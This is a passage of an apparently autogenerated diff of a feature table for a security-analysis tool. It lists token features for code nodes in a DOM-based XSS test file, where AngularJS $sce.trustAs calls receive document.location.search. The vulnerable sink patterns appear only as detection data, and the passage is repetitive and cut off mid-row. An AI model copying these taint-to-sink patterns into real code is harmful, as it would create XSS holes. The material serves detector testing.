element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:40 | document | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:40 | document | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:40 | document | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:40 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:49 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:49 | document.location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:49 | document.location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:49 | document.location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:33:84:49 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:84:33:84:56 | documen ... .search | CalleeFlexibleAccessPath | $sce.trustAs | | autogenerated/Xss/DomBasedXss/tst.js:84:33:84:56 | documen ... .search | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:84:33:84:56 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16299,6 +113671,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:84:33:84:56 | documen ... .search | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:84:33:84:56 | documen ... .search | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:84:33:84:56 | documen ... .search | receiverName | $sce | +| autogenerated/Xss/DomBasedXss/tst.js:84:42:84:49 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:42:84:49 | location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:42:84:49 | location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:42:84:49 | location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:42:84:49 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:84:51:84:56 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:84:51:84:56 | search | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:84:51:84:56 | search | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:84:51:84:56 | search | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:84:51:84:56 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:12 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:12 | $sce | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:12 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:12 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:12 | $sce | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:20 | $sce.trustAs | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:20 | $sce.trustAs | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:20 | $sce.trustAs | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:20 | $sce.trustAs | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:20 | $sce.trustAs | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | $sce.tr ... search) | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | exceptional return of $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | exceptional return of $sce.tr ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | exceptional return of $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | exceptional return of $sce.tr ... search) | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:9:85:56 | exceptional return of $sce.tr ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:85:14:85:20 | trustAs | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:14:85:20 | trustAs | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:14:85:20 | trustAs | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:14:85:20 | trustAs | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:14:85:20 | trustAs | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:85:22:85:25 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:22:85:25 | $sce | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:22:85:25 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:22:85:25 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:22:85:25 | $sce | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:85:22:85:29 | $sce.CSS | CalleeFlexibleAccessPath | $sce.trustAs | | autogenerated/Xss/DomBasedXss/tst.js:85:22:85:29 | $sce.CSS | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:85:22:85:29 | $sce.CSS | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16307,6 +113719,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:85:22:85:29 | $sce.CSS | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:85:22:85:29 | $sce.CSS | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:85:22:85:29 | $sce.CSS | receiverName | $sce | +| autogenerated/Xss/DomBasedXss/tst.js:85:27:85:29 | CSS | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:27:85:29 | CSS | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:27:85:29 | CSS | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:27:85:29 | CSS | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:27:85:29 | CSS | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:39 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:39 | document | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:39 | document | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:39 | document | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:39 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:48 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:48 | document.location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:48 | document.location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:48 | document.location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:32:85:48 | document.location | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:85:32:85:55 | documen ... .search | CalleeFlexibleAccessPath | $sce.trustAs | | autogenerated/Xss/DomBasedXss/tst.js:85:32:85:55 | documen ... .search | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/tst.js:85:32:85:55 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16315,6 +113742,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:85:32:85:55 | documen ... .search | enclosingFunctionName | service#functionalargument | | autogenerated/Xss/DomBasedXss/tst.js:85:32:85:55 | documen ... .search | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:85:32:85:55 | documen ... .search | receiverName | $sce | +| autogenerated/Xss/DomBasedXss/tst.js:85:41:85:48 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:41:85:48 | location | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:41:85:48 | location | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:41:85:48 | location | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:41:85:48 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:85:50:85:55 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:85:50:85:55 | search | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:85:50:85:55 | search | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:85:50:85:55 | search | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:85:50:85:55 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:12 | $sce | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:12 | $sce | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:12 | $sce | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:12 | $sce | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:12 | $sce | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:20 | $sce.trustAs | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:20 | $sce.trustAs | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:20 | $sce.trustAs | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:20 | $sce.trustAs | enclosingFunctionName | service#functionalargument | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:20 | $sce.trustAs | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | $sce.tr ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | $sce.tr ... search) | contextSurroundingFunctionParameters | ($sce, $other) | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | $sce.tr ... search) | enclosingFunctionBody | $sce $other $sce trustAsHtml document location search $sce trustAsCss document location search $sce trustAsUNKNOWN document location search $sce trustAs $sce HTML document location search $sce trustAs $sce CSS document location search $sce trustAs UNKNOWN document location search $other trustAsHtml document location search | +| autogenerated/Xss/DomBasedXss/tst.js:86:9:86:55 | 